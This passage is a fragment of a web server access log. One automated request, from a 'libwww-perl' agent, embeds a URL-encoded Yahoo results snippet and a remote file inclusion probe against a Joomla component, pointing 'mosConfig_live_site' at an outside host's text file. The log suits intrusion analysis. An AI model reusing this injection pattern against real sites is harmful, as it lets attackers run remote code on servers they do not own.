20...%3C/div%3E%3Cspan%20class=url%3Ezhuaxia.com/pre_channel/122350/%3Cwbr%20/%3E?logId=181%3C/span%3E%20-%20%3Cem%3E148k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkxMGr5pIPFIBnq1XNyoA;_ylu=X3oDMTB0NTJtNzhvBHNlYwNzcgRwb3MDODc3BGNvbG8Dc2sxBHZ0aWQD/SIG=12dhfd4kk/EXP=1218183302/**http%3a/dvd.czdc.cz/home-php-mos-onfig-absolute-path-http-/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 1218 "-""libwww-perl/5.79"
